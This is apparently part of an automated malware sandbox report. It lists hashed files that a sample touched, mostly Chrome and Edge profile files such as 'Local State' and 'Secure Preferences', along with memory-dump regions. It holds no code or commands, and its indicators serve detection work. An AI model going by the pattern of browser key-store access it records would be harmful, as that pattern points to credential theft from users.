SHA512 8a0347f665bcc3c093c9b5d1057b61e6d5ae328cf558c2c6cc977060f0c3b14d1a6f5c5669d1bb294fef86badd653dce3aac650eab8bfc0c8c73a38a59f5ca90

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 1875d07ea5d1584a2110e10adaa2ddfa
SHA1 1595ec8502bb29e81c8b1c8cc641b5c1e6cae04f
SHA256 e4e0031d3258724010ec1e6b8bff79ac68f48cceaf8cf0d90dce1021cf75aa9c
SHA512 dac92772ad8b4f643ca088cf799b2ee6581a13e6996df5b0157fb4b71de7f12408fc266191b6675a03a7bc9910d4581aa7528c7d5e8e07b58f005fa80faa688a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 5294ac11c8066faff45a77acfa1720ba
SHA1 122a2702a6954284b77402040e5b71c69d0703c0
SHA256 2aa1fa3b0ee3d11dccdf7e93ef823167c505cf0dc3d7a615e4cbe7d5e51fb6e9
SHA512 85d612f8c1603fd90c2a6975c6cbdf68aded17b0ab1a4099adba6f5b90f86d507e15346b530fcc2deae3f77d7c8fa041026568e0f41cf5d6d0f127bba0ad050d

memory/2776-221-0x00007FFBFC7B0000-0x00007FFBFC7C0000-memory.dmp

memory/2776-223-0x00007FFBFC7B0000-0x00007FFBFC7C0000-memory.dmp

memory/2776-225-0x00007FFBFC7B0000-0x00007FFBFC7C0000-memory.dmp

memory/2776-224-0x00007FFBFC7B0000-0x00007FFBFC7C0000-memory.dmp

memory/2776-222-0x00007FFBFC7B0000-0x00007FFBFC7C0000-memory.dmp

memory/2776-226-0x00007FFBFA3B0000-0x00007FFBFA3C0000-memory.dmp

memory/2776-227-0x00007FFBFA3B0000-0x00007FFBFA3C0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\odc.officeapps.live.com\83A384CA-CB51-4DA8-A25F-E21E778DBEA6

MD5 85ad173999ed440af6120f3b4fd436fa
SHA1 eebe3bae40b0c82db581b905e2a4c4a90055c9b3
SHA256 2fb3e7ca57b5ec8657ff2b909c74dee246e7ed2b30abd60dec96fc4fb88bd165
SHA512 3c506252a27bc4a3d718fc2ad89036850ee3c9d5fd79966fc5e28debe1844d96e8d2777e160e8537034129fd8109dff027bf5eb4a082c99d0db93730ec31427e

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\odc.officeapps.live.com\31EDE42F-56AB-4838-AF9E-BCC4E3C7BCCB

MD5 2f82426450332b558a61ae9ca551abd9
SHA1 abdbf8f8bdd7572bcdefbd1e0b7da8d3cf17144d
SHA256 57d6315a8f1f11aaa111a9956ddd0d560f791f757c379ed77bbb5a1b5b577f52
SHA512 dbc43dab6cbde98647c5a88cd508a1528ef79c030286cf82cb4cb03c4af81930ad1c3b2644ead9eceea27cd5772324f42a51f04f1693102254567205a6abf0b5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 09ad7e1ebc856ddc6b3e616d4ff463fd
SHA1 d076c42e9eaa07a46b4dc732e5ef6b4d671f224f
SHA256 c8e9ab42c6b1d9188cdccc509349177678fbbfd037d11561c08635c209e6f8df
SHA512 6d85d2ad34f33fa042390f5bf8e9bde253d96e1284203742cc46ac5fc59460ee733f34b2900d6a9318668cc20cb2a9329b5f8ee3d81fc7ac4354002f582a4f43

C:\Users\Admin\AppData\Local\Temp\TCD3D7E.tmp\sist02.xsl

MD5 f883b260a8d67082ea895c14bf56dd56
SHA1 7954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256 ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512 d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 ac8f04d5157803821a55d329d8e6b050
SHA1 3c05cd36eed003b75c40cb2affe9ada7e9ab055f
SHA256 dce01c86daa75204e48f1c932f17a634ca3117886edad18cd797e30b5b76b0c0
SHA512 d7e6d65312884de420774c3e1a2890e0477e00badfe13d0d06ef9e888090a86176089a2457ed3ba762c50adada85fba6793aa4f22ebab9cef06fad83109e8cf1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 c9959d144b5f557dad2d1c10cbc29b74
SHA1 b0681501b44ac01cc0b30696f0eea46258ff4817
SHA256 95510b6f43a1b77fd16a9bb3155dbd0b31da601b69f3116c833d12092cea996a
SHA512 4215689322155e862ebdd2c31515639e3f078626b506136d241ad9f188e961124cf90bc77aee2aff498de6c01134ac4df059b4bf826d4af748e5ada352bb4d94

memory/2776-803-0x00007FFBFC7B0000-0x00007FFBFC7C0000-memory.dmp

memory/2776-802-0x00007FFBFC7B0000-0x00007FFBFC7C0000-memory.dmp

memory/2776-805-0x00007FFBFC7B0000-0x00007FFBFC7C0000-memory.dmp

memory/2776-804-0x00007FFBFC7B0000-0x00007FFBFC7C0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6451e72ccb7c7defa559ad00f2a6aebd
SHA1 10d4ff1f49c7dfcda876034a221aae34b0f2b024
SHA256 5fe15c09cf6046c1cb4e7f9ddc94d246fe9290e50b5be554136c94f65eb7d245
SHA512 e62faa8b82e1b2148fcfecaa6ad771d307828d6c578cab5257462b155e037ec1eb8d3d3561739f51775c67b3cdca270b29851757b6d5a6c193bd2c93e9d4fb91

memory/4224-833-0x0000000002D90000-0x0000000002DC6000-memory.dmp

memory/4224-834-0x0000000005950000-0x0000000005F7A000-memory.dmp

memory/4224-835-0x00000000056F0000-0x0000000005712000-memory.dmp

memory/4224-836-0x0000000005FF0000-0x0000000006056000-memory.dmp

memory/4224-837-0x0000000006060000-0x00000000060C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1yfzzflo.uof.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4224-846-0x0000000006150000-0x00000000064A7000-memory.dmp

memory/4224-850-0x0000000006580000-0x000000000659E000-memory.dmp

memory/4224-851-0x00000000065A0000-0x00000000065EC000-memory.dmp

memory/4224-852-0x0000000007BE0000-0x000000000825A000-memory.dmp

memory/4224-853-0x0000000006AD0000-0x0000000006AEA000-memory.dmp

memory/4224-854-0x0000000007AC0000-0x0000000007AF4000-memory.dmp

memory/4224-855-0x000000006B060000-0x000000006B0AC000-memory.dmp

memory/4224-864-0x0000000007B00000-0x0000000007B1E000-memory.dmp

memory/4224-865-0x0000000007B30000-0x0000000007BD4000-memory.dmp

memory/4224-866-0x00000000082A0000-0x00000000082AA000-memory.dmp

memory/4224-867-0x0000000008410000-0x00000000084A6000-memory.dmp

memory/4224-868-0x00000000082B0000-0x00000000082C1000-memory.dmp

memory/4224-869-0x0000000007A70000-0x0000000007A7E000-memory.dmp

memory/4224-870-0x0000000008300000-0x000000000831A000-memory.dmp

memory/4224-871-0x0000000007B20000-0x0000000007B2A000-memory.dmp

memory/4224-872-0x0000000008280000-0x0000000008288000-memory.dmp

memory/4224-873-0x00000000082A0000-0x00000000082A8000-memory.dmp

memory/4224-874-0x00000000082E0000-0x00000000082E8000-memory.dmp

memory/5456-875-0x0000000000400000-0x0000000000416000-memory.dmp

memory/5456-876-0x0000000000E10000-0x0000000000E26000-memory.dmp

memory/4224-882-0x0000000008630000-0x0000000008652000-memory.dmp

memory/4224-887-0x0000000008C10000-0x00000000091B6000-memory.dmp

memory/5412-911-0x00000000052C0000-0x000000000535C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 d45737e151668355725eba9782795bde
SHA1 f07dfb888849bf949bb91d18db30562cc2c4f191
SHA256 2338f028787fc0f3af074cb4808715fe76dfdd40adbd0e5d3d8cd02e70882166
SHA512 285ca128c14e47ed1d7b991fd8a5c9ef78e95e108dd137a887dd6df97fdf8c970978269792cdd6af6162bc7b7febb04f1e67b0d9377553e88d53a4bae0a98bfb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 d597eed544cc91ad042b6281caff16b4
SHA1 81d9515ba090186f3e32a1521bc3ab88cce3e801
SHA256 1a38245f65574e0da42d65e4c1c372a8e0910c16eb295ce4297c88dffa805d52
SHA512 eadee138466e6f238d1f75049a2dd642690164600f624361e20721d3d9aa6173f6510fbb6d7ddc7daea3f48b2373f5b23634972abd57190930edca3e1bddf7c4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 ee7a6d8cd2ccb57738c5048bb1676e65
SHA1 1d3dd0060253cb3a773afc80665f63828d72b622
SHA256 7681bcecd10a6d1fe7aae115bc77f373e0f54d916ac94c81c949fb1ea66484a5
SHA512 460487412a2a8ec6697c296bb123e7706382e7c0981789b7efa79f7552391932b8289c5de16d207991c3395229208b605c5fb722d07185fe924f2ca90a9069a5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 e17a20373085adb84af497ce2ca66843
SHA1 6c40d4fc2bf8b6e4c86b1479193fa4cfbf834df8
SHA256 9522f99243f2e526ca5c39d4f7609b4f6adce0b8e6452e68f365362828d67b5c
SHA512 cf12c6a13911dccbb10d8a0903ce448588ad081f2b97ed4b5c381bca12ad6392acd135521c550834aea2926ce69ebddbc96bdb767935eec2e6b70c6a87e39e6c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 89a401e0747bb8486bbdded7a2415fbd
SHA1 3c203810a896c1a9b835581f9fd86254de99e0c4
SHA256 e23fec718c12ad41b7fefe77e2ee041fcee7d3ac1375ab37b2c29a537f8af5c0
SHA512 55913437bb81ca498987076b3c9b696898a4369211eb4f7becd833d6292f1a3e5e9a48342633b83bbd90ac2ccc223d2a2d630257c09a6c5836c6a51ca9f471b4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 61a2b4e3c110e6889da11cb92e180b61
SHA1 3ddcbecbc55fec96005e1b55249b5b29889d0e8b
SHA256 e1f6b49e6345cacab8a7e1b88af637dbb8379bcd077c9a0c072586ea5e8102a9
SHA512 b7e43434f674dda27fe1c7a53deaff34573513738b2c293a4548df903630d60b5734c970c1d32e85b493d0df84ceb712de60e6696b8821742cdd139f7c4ed980

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 236b24335c08a028f1c0486e28d889d7
SHA1 a8dc4c9ce41f5ad009346a240f8ede56f64a4186
SHA256 7576e2df3cb22e53f917c2291af00139a832c5b9d036974e7687de2d4c626886
SHA512 8a5ef0720dcf4f77b305b57260a89d81d78359b6caba3a3928fb1bd952c4a94f06759a9a1a7a66dcaac8bc76f3cda2bb6488a30f5223fc5d51cc782f3017636c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 78316766bc9e5c32d04270880fdcd23d
SHA1 46b0f11aa2cba736d40d1a5acdd7671942ac8cef
SHA256 05340ad64bea8d29b8845b9543e5a0b3f89a1a5dece67a84d39deee578bc214a
SHA512 ea4a9e0f2ea4a9ee82ac979221b5991e2b8dbc35e4fa0c0579ff75848a481805e55d488d566125b2214fe005ab84382348bc81883e149c29372f5b1c33fd7602

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 7d09c1bd4cd760b01e84112d33047524
SHA1 14f679b856dca3a7acae190d7d8ba662004f8249
SHA256 aac8078db4f68f7ed5d8a93fba94295dab3507ecbb2de0c1f57306609f61ec6c
SHA512 50d8323754a8acff91aef606610f9f1c56bce870a11267cfb3e9c8395e331138a0402a93d94ea9eb6013964b45a5809a289110ebc3f5cccdd58e07ed5b01077c